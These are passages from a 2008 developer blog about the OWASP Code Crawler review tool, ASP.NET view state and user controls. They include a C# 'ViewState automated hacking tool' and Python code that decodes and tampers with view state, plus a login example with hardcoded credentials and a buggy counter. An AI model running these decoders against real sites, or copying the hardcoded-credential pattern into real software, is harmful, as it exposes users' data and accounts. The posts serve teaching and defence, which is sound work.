
Code Crawler Status and Help request June 21, 2008

Posted by nTze in: Code Crawler, Code Review, owasp.org

Hello fellows,

As you know, CC development is still under way and most of the features listed for SOC 2008 are working in beta, which I'm very happy about.

The Code Crawler XML/XSL engine has been coded and I'm really proud to announce that CC will support custom templates, which will let you build and customize the look & feel of your result set.

The structure of the template is quite simple: the XML output file is mainly composed of three elements, Threat, Description and Name. I'm halfway to releasing a WFA (Wait for Approval) official OWASP template, which will be released with CC itself.

As you may also know, the CC keypointers database is in XML format now, and that's why I need your help. The current database lists around 239 potential keywords.

Here is an example:

<KeyPointer>
    <k_name>exec sp_executesql</k_name>
    <k_level>3</k_level>
    <k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
    <link>http://www.owasp.org</link>
</KeyPointer>
<KeyPointer>
    <k_name>delete from where</k_name>
    <k_level>3</k_level>
    <k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient). These are typed and treat the parameter as a literal value and not as executable code in the database.</k_description>
    <link>http://www.owasp.org</link>
</KeyPointer>

As you can see, the description tag of every item is pretty much the same for most of the categories, and that's where help is needed. If you have some time to spend and want to get involved in CC development, feel free to add or modify descriptions for keywords. All help will be highly appreciated.

The current database can be found at http://www.cyphersec.com/TestLab/CodeCrawlerDatabase.xml (102 KB). Once again, feel free to submit changes and be sure to mail them back to tools@[idontwantspam]cyphersec.com.
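To show what the keypointer database above is for, here is a small scanner in Python that is an added example, not Code Crawler's own code (CC is a .NET tool; its real matching rules are not described in the post). It loads KeyPointer entries from the XML, scans a constructed C# snippet for them, and emits the result set with the three elements the post names (Threat, Description, Name). Assumptions of the example: a <KeyPointers> root element around the entries, a <Results>/<Result> wrapper for the output, and a matching rule under which a multi-word k_name such as "delete from where" hits when its words appear in that order on a line, with anything in between.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of the keypointer DB format shown above (two entries from the
# post with shortened descriptions); the <KeyPointers> root is an assumption.
KEYPOINTER_DB = """<?xml version="1.0"?>
<KeyPointers>
  <KeyPointer>
    <k_name>exec sp_executesql</k_name>
    <k_level>3</k_level>
    <k_description>Dynamic SQL: verify that values reach the statement through SqlParameter, OleDbParameter or OdbcParameter, not string concatenation.</k_description>
    <link>http://www.owasp.org</link>
  </KeyPointer>
  <KeyPointer>
    <k_name>delete from where</k_name>
    <k_level>3</k_level>
    <k_description>Inline SQL statement: check how the WHERE clause values are supplied.</k_description>
    <link>http://www.owasp.org</link>
  </KeyPointer>
</KeyPointers>
"""

# Constructed C# input, not taken from the page.
SAMPLE_CS = """// constructed sample
string sql = "DELETE FROM Users WHERE Name = '" + name + "'";
cmd.CommandText = "EXEC sp_executesql @stmt, N'@p int', @p = " + id;
cmd.Parameters.Add(new SqlParameter("@name", name));
"""


def load_keypointers(xml_text):
    """Parse KeyPointer entries into dicts, each with a compiled matcher.

    Assumed rule: the words of k_name must occur in order on one line,
    case-insensitively, with anything in between ("delete from where"
    therefore hits "DELETE FROM Users WHERE").
    """
    pointers = []
    for kp in ET.fromstring(xml_text).iter("KeyPointer"):
        name = kp.findtext("k_name", "").strip()
        words = [re.escape(w) for w in name.split()]
        pattern = re.compile(r"\b" + r"\b.*?\b".join(words) + r"\b", re.IGNORECASE)
        pointers.append({
            "name": name,
            "level": int(kp.findtext("k_level", "0")),
            "description": kp.findtext("k_description", "").strip(),
            "link": kp.findtext("link", "").strip(),
            "pattern": pattern,
        })
    return pointers


def scan_source(source_text, pointers, filename="input.cs"):
    """Return one finding per (line, keypointer) hit, in file order."""
    findings = []
    for lineno, line in enumerate(source_text.splitlines(), 1):
        for kp in pointers:
            if kp["pattern"].search(line):
                findings.append({
                    "file": filename, "line": lineno, "code": line.strip(),
                    "name": kp["name"], "threat": kp["level"],
                    "description": kp["description"], "link": kp["link"],
                })
    return findings


def findings_to_xml(findings):
    """Emit the result set with Name/Threat/Description per hit (wrapper assumed)."""
    root = ET.Element("Results")
    for f in findings:
        r = ET.SubElement(root, "Result", file=f["file"], line=str(f["line"]))
        ET.SubElement(r, "Name").text = f["name"]
        ET.SubElement(r, "Threat").text = str(f["threat"])
        ET.SubElement(r, "Description").text = f["description"]
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    kps = load_keypointers(KEYPOINTER_DB)
    print(findings_to_xml(scan_source(SAMPLE_CS, kps, filename="Data.cs")))
```

Keyword hits are review prompts, not vulnerabilities: line 4 of the sample (the SqlParameter call) is exactly what the description asks the reviewer to look for, and it produces no finding, while the two string-built statements do.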

Thanks.
A.

Oops, we did it again. June 14, 2008

Posted by nTze in: .NET, My Life


We are out now with the updated version of the Apogeo ASP.NET pocket; anyway, I truly hope the Apogeo guys are pushing for my updated "about". It's going to be funny :)

So what about the future?

"ASP.NET 3.5" is officially my last Italian-written book; as I said before, there's a new "big fat" book coming up next year, so more to come.

"Look, Mom, no hands!"

Code Crawler 2.1.2 May 26, 2008

Posted by nTze in: Code Crawler, Code Review, owasp.org


Live from the Code Crawler development offices (lol):

  1. Done: XML database instead of SQL Server Express
  2. Alessio to implement the OWASP Orizon Project
  3. Almost done: results XML/XSLT based
  4. Almost done: scanning engine option to scan a Visual Studio solution

roadmap

Hacking ViewState for Fun and Profit May 25, 2008

Posted by nTze in: .NET, CyberCrime, Hacking

The View State object is stored in a single Base64-encoded string that looks like this:

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dDw3NDg2NTI5MDg7Oz4="/>

Because this value isn't formatted as clear text, many ASP.NET programmers assume that their view state data is encrypted. It isn't: Base64 is an encoding, not a cipher, and anyone holding the page can reverse it and read the view state data in a matter of seconds. Note that the MAC ASP.NET adds by default (EnableViewStateMac) only detects tampering; it does nothing to hide the contents. If the view state carries anything sensitive, set ViewStateEncryptionMode="Always" (in the page directive or web.config) and, better still, keep secrets out of it altogether.

Here is a PoC that shows how it can be done.

Filename: firenze.aspx.cs

/// ########################################################################################################################
/// Tool Name   : Firenze
/// Author      : Alessio "nTze" Marziali
/// Contact     : alessio@owasp.org
/// Url         : http://www.cyphersec.com
/// Note        : Microsoft ASP.NET is a powerful web application framework available on the market.
///               It's being used in big environments to build robust and scalable web applications.
///               Unfortunately, due to lack of skills, some so-called ASP.NET developers are not investing time in security.
///
///               ASP.NET security is getting more and more important, given that the framework gives its best in large
///               enterprise web application scenarios.
///
///               This tool was born to show how reading sensitive information can be possible
///               on web applications such as e-banks that rely on the ViewState object.
/// ########################################################################################################################
using System;
using System.Web;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;

/// <summary>
/// Hacking ViewState:
/// Because it isn't formatted as clear text, many ASP.NET programmers assume that their
/// view state data is encrypted. It isn't. A clever hacker could reverse-engineer this string and examine
/// your view state data in a matter of seconds (here is how).
/// </summary>
public partial class _Default : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        Page.Title = "Firenze : ViewState automated hacking tool";
        TextBox UITextBox = new TextBox();              // Create a TextBox item

        // Set properties
        UITextBox.TextMode = TextBoxMode.MultiLine;
        UITextBox.Wrap = true;
        UITextBox.Rows = 10;
        UITextBox.Width = 300;
        UITextBox.ID = "UIViewStateCode1";
        UITextBox.CssClass = "viewStateBox";
        UITextBox.Text = "ViewState goes here";

        // Show through UIReader1 (PlaceHolder). The control is re-created on every request,
        // including the postback that carries the pasted value, so the click handler can find it.
        UIReader1.Controls.Add(UITextBox);

        // UIButton properties
        UIButton1.Text = "Decode ViewState";
        UIButton1.Width = UITextBox.Width;
    }

    /// <summary>
    /// UIButton1_Click event handler
    /// </summary>
    /// <param name="sender">object</param>
    /// <param name="e">EventArgs</param>
    protected void UIButton1_Click(object sender, EventArgs e)
    {
        // Check that the TextBox control exists within the page
        TextBox retrievedControl = null;
        try
        {
            retrievedControl = (TextBox)Page.FindControl("UIViewStateCode1");
            // HTML-encode the result: the decoded 1.x format starts with "t<" and would
            // otherwise be swallowed by the browser as a tag
            UILiteral.Text = HttpUtility.HtmlEncode(ReadViewState(retrievedControl.Text));
        }
        catch (NullReferenceException)
        {
            UILiteral.Text = "Can't find textbox control, giving up..";
        }
    }

    /// <summary>
    /// theViewState contains the view state information.
    /// Convert the Base64 string to an ordinary array of bytes
    /// representing ASCII characters.
    /// </summary>
    /// <param name="theViewState">System.String - ViewState</param>
    /// <returns>System.String - Human readable code</returns>
    protected internal string ReadViewState(string theViewState)
    {
        string decodedViewState = string.Empty;
        try
        {
            byte[] stringBytes = Convert.FromBase64String(theViewState);           // Base64 -> raw bytes
            decodedViewState = System.Text.Encoding.ASCII.GetString(stringBytes);  // Interpret as 7-bit ASCII text
        }
        catch (System.FormatException)
        {
            return "Sorry, looks like you were looking for something I can't read";
        }
        return decodedViewState;
    }
}

Filename: firenze.aspx

<%@ Page Language="C#" AutoEventWireup="true"  EnableViewState="false" CodeFile="Default.aspx.cs" Inherits="_Default" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<link rel="Stylesheet" href="Css/StyleSheet.css" type="text/css" />
    <title>Hacking My Own ViewState</title>
</head>
<body>
    <form id="form1" runat="server">
        <asp:PlaceHolder id="UIReader1" runat="server" /><br /><br />
        <asp:Button ID="UIButton1" runat="server" onclick="UIButton1_Click" />
        <br /><br />
        <asp:Literal ID="UILiteral" runat="server" />
    </form>
</body>
</html>
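The same decoding from the attacker's side in Python, as an added example that is not part of the original post. It pulls the hidden field shown above out of a page, Base64-decodes it, and tells the two ASP.NET serialisations apart: the 1.x text format used by the sample (starts with "t<") and the 2.0+ ObjectStateFormatter stream (starts with bytes FF 01). The second half shows why a MAC is no substitute for encryption: a payload with an HMAC tag appended, which is how EnableViewStateMac works in principle, is still fully readable; it just cannot be altered without the key. The key value, the choice of SHA-256 and the tamper helper are the example's own assumptions (ASP.NET picks the MAC algorithm from <machineKey validation=...>).

```python
import base64
import binascii
import hashlib
import hmac
import re

# Constructed sample: the hidden field exactly as shown in the post.
SAMPLE_HTML = ('<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" '
               'value="dDw3NDg2NTI5MDg7Oz4="/>')

# Stands in for the server's <machineKey validationKey>; not a real key.
SECRET_KEY = b"constructed-validation-key-for-the-example"
TAG_LEN = hashlib.sha256().digest_size


def extract_viewstate(html):
    """Return the __VIEWSTATE value from a page, or None if there is none."""
    m = re.search(r'name="__VIEWSTATE"[^>]*\bvalue="([^"]*)"', html)
    return m.group(1) if m else None


def decode_viewstate(b64):
    """Base64-decode a __VIEWSTATE value and classify it.

    Returns (fmt, raw_bytes): 'los' for the ASP.NET 1.x text format (starts
    with 't<'), 'binary' for the 2.0+ ObjectStateFormatter stream (starts with
    FF 01), 'unknown' otherwise (typically encrypted view state). A MAC-only
    view state still classifies as 'los'/'binary' because the tag is appended
    after the readable payload.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        raise ValueError("not Base64: nothing to read") from None
    if raw.startswith(b"t<"):
        return "los", raw
    if raw.startswith(b"\xff\x01"):
        return "binary", raw
    return "unknown", raw


def mac_viewstate(payload, key=SECRET_KEY):
    """Append an HMAC-SHA256 tag and Base64-encode: tamper-evident, not secret."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload + tag).decode("ascii")


def verify_viewstate(b64, key=SECRET_KEY):
    """Return the payload if the tag verifies, else None (the server would reject it)."""
    raw = base64.b64decode(b64)
    if len(raw) <= TAG_LEN:
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


def tamper(b64):
    """Flip one bit of the first payload byte, as an attacker editing the field would."""
    raw = bytearray(base64.b64decode(b64))
    raw[0] ^= 0x01
    return base64.b64encode(bytes(raw)).decode("ascii")


if __name__ == "__main__":
    field = extract_viewstate(SAMPLE_HTML)
    fmt, raw = decode_viewstate(field)
    print(fmt, raw)                               # los b't<748652908;;>'

    signed = mac_viewstate(raw)
    print(decode_viewstate(signed)[0])            # still 'los': the MAC hides nothing
    print(verify_viewstate(signed) == raw)        # True
    print(verify_viewstate(tamper(signed)))       # None: the tag no longer matches
```

The ASCII decode in the C# tool above gives the same "t<748652908;;>" for the sample; for a 2.0+ page it will print mostly unreadable bytes, and a ViewStateEncryptionMode="Always" page will decode to nothing recognisable at all, which is the outcome you want when the state holds anything worth protecting.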

User Controls - The basics May 11, 2008

Posted by nTze in: .NET, Pro ASP.NET, riflessioni

Sooner or later, you'll want to get under the hood, start tinkering, and build your very own user interface components.
In .NET, you can plug into the web forms framework with your own controls in two ways. You can develop either of the following:

Let's start with the User Controls and the basics.

User control (.ascx) files are similar to ASP.NET web form files. Like web forms, user controls are composed of a user interface portion with control tags and can use inline script or a .cs code-behind file. User controls can contain just about anything a web page can, including static HTML content and ASP.NET controls; they also receive the same events as the Page object (such as Load and PreRender) and expose the same set of intrinsic ASP.NET objects through properties.

The key differences between user controls and web pages are as follows:

To create a user control in Visual Studio, select Website and then Add New Item, and choose the Web User Control template as shown in the image.

[image: Choose the Template]

The following is the simplest login box user control possible.

<%@ Control Language="C#" AutoEventWireup="true" CodeFile="UIWUserControl1.ascx.cs" Inherits="UIWUserControl1" %>
<b>Hello and welcome to WebSite1. Please log in.</b>
<table>
<tr>
    <td>Username</td>
    <td><asp:TextBox ID="UIusername" runat="server" />
        <asp:RequiredFieldValidator ID="RFValidator1" runat="server"
            ErrorMessage="Field is required" ValidationGroup="Validation1" ControlToValidate="UIusername"></asp:RequiredFieldValidator>
            </td>
</tr>
<tr>
    <td>Password</td>
    <td><asp:TextBox ID="UIpassword" runat="server" TextMode="Password" />
        <asp:RequiredFieldValidator ID="RFValidator2" runat="server"
            ErrorMessage="Field is required" ValidationGroup="Validation1" ControlToValidate="UIpassword"></asp:RequiredFieldValidator>
            </td>
</tr>
<tr>
    <td colspan="2"><asp:Button ID="UIbutton1" runat="server" Text="Log-in"
            onclick="UIbutton1_Click"/></td>
</tr>
</table>

As with ASP.NET web forms, the user control is a partial class, because it's merged with a separate portion generated by ASP.NET. That automatically generated portion holds the member variables for all the controls you add at design time.

To test the control, you need to place it on a web form. First, you need to tell the ASP.NET page that you plan to use the user control with the Register directive, which you can place immediately after the Page directive, as shown here:

<%@ Register TagPrefix="UIAlessio" TagName="LoginBox" Src="UIWUserControl1.ascx" %>

This line identifies the source file that contains the user control through the Src attribute. It also defines a tag prefix and tag name that will be used to declare the new control on the page, in the same way that ASP.NET server controls use the <asp:...> prefix. You can use your own tag prefixes to help distinguish the controls you've created.

This example uses a tag prefix of UIAlessio and a tag named LoginBox.

Here is the full page with the tag in place.

<%@ Page Language="C#" AutoEventWireup="true"  CodeFile="Default.aspx.cs" Inherits="_Default" %>
<%@ Register TagPrefix="UIAlessio" TagName="LoginBox" Src="UIWUserControl1.ascx" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>WebSite1 (eek)</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <UIAlessio:LoginBox id="UILoginBox" runat="server" />
    </div>
    </form>
</body>
</html>

Don't be afraid to be lazy. Once you've created your user control, simply select the .ascx file in the Solution Explorer and drag it onto the design area of a web form. Visual Studio will automatically add the Register directive for you, as well as an instance of the user control tag.

The login box didn't include any code. Instead, it simply provided a useful way to reuse a static block of web-page user interface. In many cases, you'll want to add some code to your user control, either to handle events or to add functionality that the client can access. Just like a web form, you can add this code to the user control class in a <script> block directly in the .ascx file, or you can use a separate .cs code-behind file.

To get a better idea of how this works, the next example checks how many times a user has tried to log in without success. After 5 tries, it fires off a mail through Gmail.

   1: public partial class UIWUserControl1 : System.Web.UI.UserControl
   2: {
   3:  
   4:     private Int16 m_FailedLogins = 0;
   5:     public Int16 FailedLogins
   6:     {
   7:         set { m_FailedLogins++; }
   8:         get { return m_FailedLogins; }
   9:     }
  10:  
  11:     /// <summary>
  12:     /// Send a Message to internal_ServiceManager@gmail.com
  13:     /// </summary>
  14:     private static void SendWarningEmail()
  15:     {
  16:         MailMessage msgMail = new MailMessage("myOwnedGmailAccount@gmail.com", "internal_ServiceManager@gmail.com");
  17:         SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587);
  18:         smtp.EnableSsl = true;
  19:         smtp.DeliveryMethod = SmtpDeliveryMethod.Network;
  20:         smtp.Credentials = new System.Net.NetworkCredential("username", "password");
  21:         msgMail.Body = "Warning Someones tried to login more than 5 times without success - Possible Brute Force attack";
  22:         try
  23:         {
  24:             smtp.Send(msgMail);
  25:         }
  26:         catch (Exception)
  27:         {
  28:             // put something here please
  29:         }
  30:     }
  31:  
  32:     protected void Page_Load(object sender, EventArgs e)
  33:     {
  34:  
  35:     }
  36:     protected void UIbutton1_Click(object sender, EventArgs e)
  37:     {
  38:         // Worst user validation ever
  39:         if ((UIusername.Text.Equals("Alessio")) && (UIpassword.Text.Equals("Marziali")))
  40:         {
  41:             return;
  42:         }
  43:         else